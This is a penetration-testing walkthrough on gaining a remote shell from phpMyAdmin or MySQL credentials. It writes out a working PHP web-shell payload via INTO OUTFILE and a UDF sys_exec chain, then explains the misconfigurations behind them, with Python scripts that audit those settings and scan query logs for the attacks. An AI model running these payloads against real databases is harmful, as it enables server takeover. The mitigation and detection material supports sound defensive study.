Premise
In this walkthrough I demonstrate how to compromise a target and obtain a remote shell starting from phpMyAdmin or MySQL credentials in hand. I also cover how these kinds of weaknesses and misconfigurations arise and how to mitigate them.
Skills Learned
- phpMyAdmin
- MySQL
- OSCP 2020
- Database Penetration Testing
Method 1: The PHP Shell via INTO OUTFILE
My first approach uses a powerful MySQL feature, `SELECT ... INTO OUTFILE`, which writes the result of a `SELECT` statement to a file on the database server's filesystem. My goal is to create a PHP web shell in a directory that is served to a web browser.

I start by logging into phpMyAdmin and heading over to the SQL query editor. From there I execute a crafted SQL query whose selected value is a snippet of PHP code that executes whatever system command is passed to it through a URL parameter. The `INTO OUTFILE` clause then saves that PHP code as a file in the web server's document root. Note that the file is written by the MySQL server process itself, not by phpMyAdmin or the web server: the MySQL account needs the `FILE` privilege, and the target directory must be writable by the OS user that `mysqld` runs as.

Once the file is created, I can simply access it from my browser. By appending `?cmd=` followed by a command to the URL, I execute commands on the server as the web server user; in the video I run `ifconfig` and `uname -a` to get information about the host.
This attack is only possible because of a couple of common misconfigurations:
- Insecure directory permissions: the web server's document root is writable by the OS user the MySQL server runs as (on most Linux installs, `mysql`). This should never be the case. The directory should be `755` and owned by root or a deploy account, so only the owner can create files there; neither `mysql` nor `www-data` should be able to write to it.
- `secure_file_priv` setting: the `secure_file_priv` variable in the MySQL configuration is empty (unrestricted) instead of pointing at a dedicated, non-web-accessible directory. Set it to such a directory, or to `NULL` to disable `LOAD_FILE()`, `INTO OUTFILE` and `INTO DUMPFILE` entirely. The variable is read-only at runtime, so the change takes effect only after a server restart; check the current value with `SHOW VARIABLES LIKE 'secure_file_priv';`.

A third control sits in the database itself: the account phpMyAdmin connects with should not hold the `FILE` privilege (verify with `SHOW GRANTS;`), since without it neither `INTO OUTFILE` nor `LOAD_FILE()` works regardless of directory permissions.
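Both preconditions are easy to audit offline. The following Python script is an added example, not code from the original post: it parses a `my.cnf` fragment to classify `secure_file_priv`, and checks a document root's mode bits for group or world write. The config fragments, the `/var/www` web root and the scratch `html` directory it creates are constructed for the demonstration.

```python
"""Offline check of the two Method 1 preconditions: the secure_file_priv
setting in my.cnf and a group/world-writable document root.
Added example; the config fragments and paths below are constructed."""
import os
import re
import stat
import tempfile

# Constructed my.cnf fragments (assumptions, not any real target's config).
UNRESTRICTED_CNF = """
[mysqld]
user = mysql
datadir = /var/lib/mysql
secure_file_priv =
"""
HARDENED_CNF = """
[mysqld]
user = mysql
secure_file_priv = /var/lib/mysql-files
"""
DISABLED_CNF = """
[mysqld]
secure-file-priv = NULL
"""


def mysqld_options(cnf_text):
    """Return {option: value} from the [mysqld] section. MySQL treats '-' and '_'
    in option names as equivalent, so names are normalised to '_'."""
    opts, section = {}, None
    for raw in cnf_text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('!'):      # skip blanks and !includedir
            continue
        m = re.match(r'^\[(.+)\]$', line)
        if m:
            section = m.group(1).strip().lower()
            continue
        if section != 'mysqld':
            continue
        key, _, value = line.partition('=')
        opts[key.strip().replace('-', '_').lower()] = value.strip().strip('"\'')
    return opts


def classify_secure_file_priv(opts, web_root='/var/www'):
    """Map the secure_file_priv value to (label, explanation)."""
    if 'secure_file_priv' not in opts:
        return 'unset', ('not in the config file, so the build default applies; '
                         "confirm with SHOW VARIABLES LIKE 'secure_file_priv'")
    value = opts['secure_file_priv']
    if value == '':
        return 'unrestricted', 'empty: INTO OUTFILE/DUMPFILE and LOAD_FILE() work in any directory mysqld can write'
    if value.upper() == 'NULL':
        return 'disabled', 'NULL: file import and export are disabled entirely'
    path = os.path.normpath(value)
    if path == web_root or path.startswith(web_root + os.sep):
        return 'unrestricted', f'restricted to {path}, but that is inside the web root {web_root}'
    return 'restricted', f'restricted to {path}'


def writable_by_group_or_world(mode):
    """True when the mode bits let anyone but the owner create files (e.g. 0777)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_web_root(path):
    """(ok, message) for a document root; ok is False when mysqld, running as a
    non-owner, could drop shell3.php there."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if writable_by_group_or_world(mode):
        return False, f'{path} is mode {mode:04o}: group/world-writable, fix with chmod 755'
    return True, f'{path} is mode {mode:04o}'


def demo_directory_check():
    """Create a scratch 'html' directory, make it 0777 (the vulnerable state),
    then apply the 0755 fix; returns the two audit verdicts."""
    with tempfile.TemporaryDirectory() as d:
        html = os.path.join(d, 'html')
        os.mkdir(html)
        os.chmod(html, 0o777)
        before = audit_web_root(html)[0]
        os.chmod(html, 0o755)
        after = audit_web_root(html)[0]
    return before, after


if __name__ == '__main__':
    for name, cnf in (('unrestricted', UNRESTRICTED_CNF), ('hardened', HARDENED_CNF), ('disabled', DISABLED_CNF)):
        print(name, classify_secure_file_priv(mysqld_options(cnf)))
    print('directory check (before fix, after fix):', demo_directory_check())
```

The `unset` case is deliberately not treated as safe: when the option is absent, the effective value comes from the build, so the only reliable check is `SHOW VARIABLES` on the running server.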
Method 2: The User-Defined Function (UDF) Exploit
My second method is a bit more advanced and involves using a User-Defined Function (UDF) to execute system commands. A UDF is a custom function, compiled as a native shared library, that MySQL loads with `CREATE FUNCTION ... SONAME` to extend its functionality.

First, I need to get the malicious UDF shared library onto the victim machine (in the video it sits at `/tmp/mysql_udf.so`). I then use the MySQL command prompt to create a table with a `BLOB` column and load the binary into it with `LOAD_FILE()`. Next, I dump that row with `INTO DUMPFILE` into a new shared-library file in a directory the MySQL server can load from. Both `LOAD_FILE()` and `INTO DUMPFILE` are subject to the same `FILE` privilege and `secure_file_priv` restriction as Method 1.

Finally, I create a new function in MySQL that maps to the `sys_exec` entry point of the newly created shared library, and call it with the command I want to run. This method is more complex and can be tricky to pull off: on current MySQL versions `CREATE FUNCTION ... SONAME` only loads libraries from the directory named by `plugin_dir` (`SHOW VARIABLES LIKE 'plugin_dir';`), which is typically owned by root and not writable by the `mysql` user, and the whole chain is often blocked by mandatory access control such as AppArmor on Ubuntu systems, which confines `mysqld` to its own directories.
Technical Commands Used
Throughout this demonstration, I use a variety of commands to achieve my goals. Here are some of the key commands I use:
- Creating a PHP web shell (SQL, run from the phpMyAdmin query editor):

```sql
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell3.php';
```

- Checking network and system information (passed through `shell3.php?cmd=`):

```sh
ifconfig
uname -a
```

- Changing directory permissions (the fix for the document root; `html` here is `/var/www/html`):

```sh
chmod 755 html
```

- Connecting to MySQL:

```sh
mysql -h [IP address] -u [username] -p
```

- Creating a table for the UDF (SQL):

```sql
CREATE TABLE udf2 (line BLOB);
```

- Loading the UDF into the table (SQL; `/tmp/mysql_udf.so` must already be on the target, and `LOAD_FILE()` needs the `FILE` privilege):

```sql
INSERT INTO udf2 VALUES (LOAD_FILE('/tmp/mysql_udf.so'));
```

- Dumping the UDF to a shared library (SQL):

```sql
SELECT * FROM udf2 INTO DUMPFILE '/var/log/mysql/lib_mysql_udf_sys.so';
```

- Creating the UDF in MySQL (SQL; on current versions the library must sit in `plugin_dir` for this to succeed):

```sql
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysql_udf_sys.so';
```
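Every step of both methods passes through the MySQL server as a statement, so the general query log is the natural place to detect them. The following Python script is an added example, not the post's own tooling: it parses general_log lines of the form `<timestamp> <thread id> <command> <argument>`, flags `INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE()`, `CREATE FUNCTION ... SONAME` and `sys_exec()` calls, escalates a file write whose path lands under a typical document root, and links a file write and a `SONAME` registration on the same connection into one UDF chain. The log lines and the document-root list are constructed for the example.

```python
"""Hunt for MySQL file-write and UDF abuse in general_log output.
Added example; the log lines and document-root list are constructed."""
import re
from dataclasses import dataclass

# Constructed general_log lines: <timestamp>\t<thread id> <command>\t<argument>.
SAMPLE_LOG = """\
2024-03-02T09:15:01.000000Z\t   42 Connect\tpma@localhost on information_schema using TCP/IP
2024-03-02T09:15:02.000000Z\t   42 Query\tSELECT * FROM users WHERE id = 7
2024-03-02T09:15:03.000000Z\t   42 Query\tSELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell3.php'
2024-03-02T09:16:10.000000Z\t   43 Query\tCREATE TABLE udf2 (line BLOB)
2024-03-02T09:16:11.000000Z\t   43 Query\tINSERT INTO udf2 VALUES (LOAD_FILE('/tmp/mysql_udf.so'))
2024-03-02T09:16:12.000000Z\t   43 Query\tSELECT * FROM udf2 INTO DUMPFILE '/var/log/mysql/lib_mysql_udf_sys.so'
2024-03-02T09:16:13.000000Z\t   43 Query\tCREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysql_udf_sys.so'
2024-03-02T09:16:14.000000Z\t   43 Query\tSELECT sys_exec('id > /tmp/out')
2024-03-02T09:17:00.000000Z\t   44 Query\tSELECT name INTO OUTFILE '/var/lib/mysql-files/export.csv' FROM users
"""

# Assumption: typical document roots; adjust to the environment.
WEB_ROOTS = ('/var/www/', '/srv/www/', '/usr/share/nginx/html/')

RULES = [  # (name, severity, pattern)
    ('udf_create',  'critical', re.compile(r'\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b', re.I)),
    ('udf_call',    'critical', re.compile(r'\bsys_(?:exec|eval)\s*\(', re.I)),
    ('php_payload', 'critical', re.compile(r'<\?php', re.I)),
    ('file_write',  'high',     re.compile(r'\bINTO\s+(?:OUTFILE|DUMPFILE)\b', re.I)),
    ('file_read',   'medium',   re.compile(r'\bLOAD_FILE\s*\(', re.I)),
]
OUTFILE_PATH = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)
LINE = re.compile(r'^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$')


@dataclass
class Finding:
    time: str
    thread: int
    severity: str
    rule: str
    query: str


def parse_general_log(text):
    """Return (time, thread, command, argument) tuples; continuation lines of a
    multi-line statement (no leading timestamp) are folded into the previous entry."""
    entries = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m:
            t, tid, cmd, arg = m.groups()
            entries.append([t, int(tid), cmd, arg])
        elif entries:
            entries[-1][3] += ' ' + raw.strip()
    return [tuple(e) for e in entries]


def scan(text):
    """Apply RULES to every Query entry; a file write under a document root is
    re-labelled webshell_write and raised to critical."""
    findings = []
    for t, tid, cmd, arg in parse_general_log(text):
        if cmd != 'Query':
            continue
        for name, sev, pat in RULES:
            if not pat.search(arg):
                continue
            if name == 'file_write':
                m = OUTFILE_PATH.search(arg)
                if m and m.group(1).startswith(WEB_ROOTS):
                    sev, name = 'critical', 'webshell_write'
            findings.append(Finding(t, tid, sev, name, arg))
    return findings


def threads_with_udf_chain(findings):
    """Thread ids that both wrote a file and registered a SONAME function:
    the Method 2 sequence on a single connection."""
    by_thread = {}
    for f in findings:
        by_thread.setdefault(f.thread, set()).add(f.rule)
    return sorted(t for t, rules in by_thread.items()
                  if 'udf_create' in rules and rules & {'file_write', 'webshell_write'})


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f'{f.time} thread={f.thread} {f.severity:8} {f.rule:15} {f.query[:70]}')
    print('UDF chain on threads:', threads_with_udf_chain(hits))
```

On a live server the input comes from `SET GLOBAL general_log = 'ON'` (with `general_log_file` pointing at the file to read); the general log is noisy, so in practice the same rules belong in an audit plugin or proxy log pipeline. The export to `/var/lib/mysql-files` in the sample stays at `high` on purpose: a write to the `secure_file_priv` directory is legitimate use, and only the path under a web root is the web-shell signature.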
Video Walkthrough
You can also watch my video about Database Pentesting using UDFs for your reference.